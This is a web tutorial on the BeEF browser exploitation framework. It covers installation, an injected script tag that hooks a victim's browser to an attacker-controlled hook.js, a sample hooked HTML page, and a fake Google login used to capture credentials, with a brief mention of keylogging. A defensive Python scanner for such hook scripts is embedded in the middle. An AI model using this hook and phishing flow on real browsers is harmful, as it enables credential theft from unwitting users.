BeEF Hacking Framework Tutorial [5 Easy Steps] | GoLinuxCloud (2024)

Hello learners, in this guide we will apply both BeEF hacking and social engineering to steal credentials from our target’s browser. Man-in-the-browser hacking is very difficult to detect, since the attacker disguises himself as a normal or verified user in order to obtain information in both directions (from the user and from the server). A hacker sits in the middle of the communication channel between the server and the website user.

Brief Introduction to BeEF

BeEF stands for Browser Exploitation Framework. It uses client-side attack vectors to assess the security level of the target environment. BeEF hacking involves hooking one or more web browsers and using them to launch command modules that attack the target system from within the browser context. Each browser may have a different set of attack vectors, since each runs in a different security context.

Pre-requisites

  • Have Ruby installed (version 2.5 or newer)
  • Have Node.js (10 or newer)
  • Have SQLite
  • Have the gems listed in the Gemfile
  • Have Mac OS X 10.5.0 or higher, or a modern Linux

Install SQLite

SQLite is a DBMS contained in a C library. It differs from other database management systems in that it is not a client-server database engine; instead, it is embedded in the program. It comes pre-installed on Kali Linux.

Installing SQLite on Linux takes a single command.

sudo apt-get install sqlite3

Install Ruby

Ruby is an open-source, dynamic programming language focused on simplicity. It is installed by default on Linux, but if you find it missing you can install it by running the command below.

sudo apt-get install ruby-full

Install Gemfiles

Gems are Ruby packages used to extend an application's functionality. They contain reusable functions shared among Ruby users. We will install the gems using Bundler, since it makes it easy to install many gems with a single command.

We open a terminal window and run the command below to install Bundler.

gem install bundler

We start by creating an empty Gemfile in our beef-xss root folder and pasting the required gems into it. We then install the required gems from the specified sources using the commands below.

$ bundle install
$ git add Gemfile Gemfile.lock

NOTE:

As of now, the BeEF framework is not yet supported on Windows.

Steps to perform BeEF Hacking

With that in mind, let’s jump right into BeEF hacking.

Step 1: Installing BeEF

BeEF does not come pre-installed on newer versions of Kali Linux (from version 2019.3), but if you update an older version of Kali Linux you will not lose the BeEF framework. You do have to use “beef-xss” to launch the framework instead of “beef”, as it was on earlier versions. Whether you had BeEF pre-installed or have to install it, the installation command is the same.

sudo apt install beef-xss

Step 2: Launching beef hacking framework

After installing BeEF we move on to the second step, which is starting the framework in order to access the user interface and get the hook we need to attack our victim.

sudo beef-xss

In the area marked by the red box we have two very important things: the web UI, which is the address from which you access the user panel of the BeEF framework, and the web hook, which is a JavaScript script that you need to insert into the vulnerable website in order to hook your victim’s browser.

NOTE:

The default BeEF username and password are “beef:beef”.

The web UI should look like the one below

And after logging in we have a view that looks as shown below. From here you can see the hacked browsers both online and offline.

Step 3: Hooking the target web browser

Once we have logged into the BeEF framework UI, we have to create a hook through which we will be able to attack the victim. The hook script looks like this.

<script src="http://<IP ADDRESS>:3000/hook.js"></script>

Replace <IP ADDRESS> with the IP address that your victim’s browser will hook back to. The BeEF framework provides a demo site, which can be accessed via

http://127.0.0.1:3000/demos/basic.html

But we will be creating our own HTML file, to which we will add our hook.

<html>
  <head>
    <title>BEEF HACKING</title>
    <script src="http://127.0.0.1:3000/hook.js"></script>
  </head>
  <body>
    <h1>YOU HAVE BEEN HACKED!!!</h1>
  </body>
</html>

We now have to run our HTML file on a web browser.

As you can see, we have our victim’s web browser hooked.
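
From the defender's side, the hook is an ordinary script tag that loads code from another origin, so it can be found by auditing the script sources of the pages you serve. The following is an added example, not part of the original tutorial or of the BeEF project; the function names, the allow-list parameter and the sample page are assumptions made for illustration, while the file name and port are the ones in the hook tag above.

```python
from html.parser import HTMLParser
from urllib.parse import urljoin, urlsplit

# File name and port as they appear in the hook tag shown in this tutorial.
HOOK_FILENAME = "hook.js"
HOOK_PORT = 3000

class ScriptCollector(HTMLParser):
    """Collect the src attribute of every <script> tag."""
    def __init__(self):
        super().__init__()
        self.sources = []

    def handle_starttag(self, tag, attrs):
        src = dict(attrs).get("src")
        if tag == "script" and src:
            self.sources.append(src.strip())

def origin(url):
    parts = urlsplit(url)
    return (parts.scheme, parts.hostname, parts.port)  # same-origin key

def audit_scripts(page_url, html, allowed_hosts=()):
    """Return (url, reasons) for every script loaded from another origin."""
    collector = ScriptCollector()
    collector.feed(html)
    findings = []
    for src in collector.sources:
        url = urljoin(page_url, src)  # resolve relative and //host forms
        parts = urlsplit(url)
        if origin(url) == origin(page_url) or parts.hostname in allowed_hosts:
            continue
        reasons = ["cross-origin script"]
        if parts.path.rsplit("/", 1)[-1].lower() == HOOK_FILENAME:
            reasons.append("file name matches the hook")
        if parts.port == HOOK_PORT:
            reasons.append("served from port 3000")
        if parts.scheme == "http":
            reasons.append("loaded over plain HTTP")
        findings.append((url, reasons))
    return findings

# Constructed sample page (hypothetical hosts, documentation IP range).
SAMPLE = """<script src="/static/app.js"></script>
<script src="https://cdn.example.com/lib.js"></script>
<script src="http://192.0.2.10:3000/hook.js"></script>"""

if __name__ == "__main__":
    for url, reasons in audit_scripts("https://shop.example/", SAMPLE, {"cdn.example.com"}):
        print(url, "->", ", ".join(reasons))
```

Treat any cross-origin script that is not on the allow-list as the finding; the file-name and port checks only raise its priority.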

Step 4: Executing commands on the victim’s browser

We now have a BeEF hook on the victim’s browser, and we can execute numerous commands within the BeEF framework in order to collect important information we may require from the victim’s browser. Some of the capabilities available in the BeEF framework are shown below by category.

As you can see we have over 100 commands which we can use against the victims’ browsers.

Step 5: Launching a social-engineering attack

In this guide we will try to carry out a social engineering attack on our victim in order to acquire the user’s login details. We just have to select the command we need and execute it.

We will be acquiring the user’s Gmail login details. Once we execute the command, the victim will be redirected to a webpage similar to the Google login page, requiring him/her to enter a username and password as shown below.

Once the user enters his/her username and password, we will be able to view it right from our BeEF framework (see image below). After the user clicks the sign-in button, he/she will be redirected to the official Google sign-in page. This helps make the attack stealthier.

We now have the user’s email username and password. The BeEF framework also acts as an advanced keylogger: it is able to collect the keys pressed by a victim while using the browser, which makes it more dangerous.

Summary

The BeEF framework is a powerful tool that systems security professionals can use to help design systems, especially web apps, that are safe for the end user. A hacker with the necessary knowledge can also add his own modifications to the BeEF framework to make it more powerful. For example, a hacker can design the login page of any website he needs information from and even customize the URLs of the phishing page to make them look more believable to the victim. As users of the internet, we should avoid visiting malicious and insecure websites so that we do not become victims of BeEF hacking. We should also check the authenticity of web pages that require us to provide personal details.


Article information

Author: Twana Towne Ret
